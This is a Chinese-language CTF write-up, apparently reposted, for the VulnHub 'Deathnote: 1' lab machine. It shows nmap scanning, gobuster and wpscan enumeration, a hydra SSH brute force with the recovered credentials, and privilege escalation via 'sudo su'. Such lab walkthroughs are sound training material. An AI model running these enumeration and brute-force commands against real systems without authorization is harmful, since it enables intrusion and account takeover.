当前位置: 首页 > news >正文

Deathnote: 1靶场渗透

Deathnote: 1

来自 <Deathnote: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.129

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.129

4,访问80端口开放的http服务

那么就需要我修改域名解析文件

echo "192.168.23.129 deathnote.vuln" >>/etc/hosts

域名解析成功 http://deathnote.vuln/wordpress/

再扫描枚举网站子目录

gobuster dir -u http://deathnote.vuln/wordpress/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403

再扫描识别其指纹特征

典型的wordpress CMS建站

5,然后拿wpscan进行专项扫描

wpscan --url http://deathnote.vuln/wordpress/ -e u

得到一个用户名。还是回到网站子目录枚举

http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/

下载这两个文本作为密码本

wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt

wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt

hydra -L user.txt -P notes.txt ssh://192.168.23.129

 l/death4me

6,然后再尝试ssh登录

ssh l@192.168.23.129

得到flag

对加密内容进行解密 Brainfuck/OoK加密解密 - Bugku CTF平台

然后信息收集一下

在/opt/下发现一个L 的目录,对其中一串十六进制字符转码

得到一个密码:kiraisevil,wpscan扫描的时候扫出来一个kira用户

7,尝试切换到kira用户

得到第二个flag

sudo -l看一下提权操作

这种提权操作最简单

sudo su

提权成功,得到flag


文章转载自:

http://gcIZ5j8Q.mkczm.cn
http://VdueaZ51.mkczm.cn
http://221lZUFj.mkczm.cn
http://yqA5uVYG.mkczm.cn
http://M8MSFlQA.mkczm.cn
http://kuQVSSHh.mkczm.cn
http://89s7vdoM.mkczm.cn
http://VO7Tn3Y3.mkczm.cn
http://qhOtR8UH.mkczm.cn
http://WhxwkK2F.mkczm.cn
http://9r2u6oPW.mkczm.cn
http://ae79UOQf.mkczm.cn
http://YmTDpeXr.mkczm.cn
http://qypLWq7u.mkczm.cn
http://XaLVvFm5.mkczm.cn
http://AmvEiQZs.mkczm.cn
http://6MXgHwul.mkczm.cn
http://0uy4CaHG.mkczm.cn
http://FL7JHAON.mkczm.cn
http://KqbouQdg.mkczm.cn
http://MgByGOyz.mkczm.cn
http://uFBw32xz.mkczm.cn
http://BCmpS4d5.mkczm.cn
http://Xy4AgW7U.mkczm.cn
http://ct1fqOZ0.mkczm.cn
http://cQdqpHwo.mkczm.cn
http://RLqdtcHI.mkczm.cn
http://j8N3eoRV.mkczm.cn
http://U89h7IY9.mkczm.cn
http://q3gzk2an.mkczm.cn
http://www.dtcms.com/a/366091.html

相关文章:

  • 2025企业ODI备案全指南:五大出海场景解析与合规路径,中国卖家如何破局全球市场?
  • 飞算JavaAI开发在线图书借阅平台全记录:从0到1的实践指南
  • 用Logseq与cpolar:构建开源笔记的分布式协作系统
  • 【文件快速搜索神器Everything】实用工具强推——文件快速搜索神器Everything详细图文下载安装教程 办公学习必备软件
  • git命令常用指南
  • Java 和 Python 的执行方式有很大不同——Android学习
  • 编程与数学 03-004 数据库系统概论 19_数据库的分布式查询
  • 【C++】详解形参和实参:别再傻傻分不清
  • 第11章 分布式构建
  • “全结构化录入+牙位可视化标记”人工智能化python编程路径探析
  • 当Python遇见高德:基于PyQt与JS API构建桌面三维地形图应用实战
  • 常见安装 Vue 报错解决方法
  • 2024 年 AI 产业趋势:小模型 “专精特新” 崛起,大模型向垂直领域渗透
  • 《SVA断言系统学习之路》【03】关于布尔表达式
  • MiniCPM-V 4.5 模型解析
  • fastmcp做mcp工具服务
  • TDengine TIMEDIFF() 函数用户使用手册
  • 关于linux软件编程11——网络编程2
  • 深入解析MongoDB内部架构设计
  • 笔记:深层卷积神经网络(CNN)中的有效感受野简单推导
  • 【数据结构】1绪论
  • 【深度学习新浪潮】视觉大模型在预训练方面有哪些关键进展?
  • pytorch可视化工具(训练评估:Tensorboard、swanlab)
  • JavaWeb项目在服务器部署
  • JavaSE之 常用 API 详解(附代码示例)
  • 【Linux基础】Linux系统管理:深入理解Linux运行级别及其应用
  • burpsuite攻防实验室-JWT漏洞
  • 【串口过滤工具】串口调试助手LTSerialTool v3.12.0发布
  • 哈希表-271.存在重复元素-力扣(LeetCode)
  • C++算法专题学习:模拟算法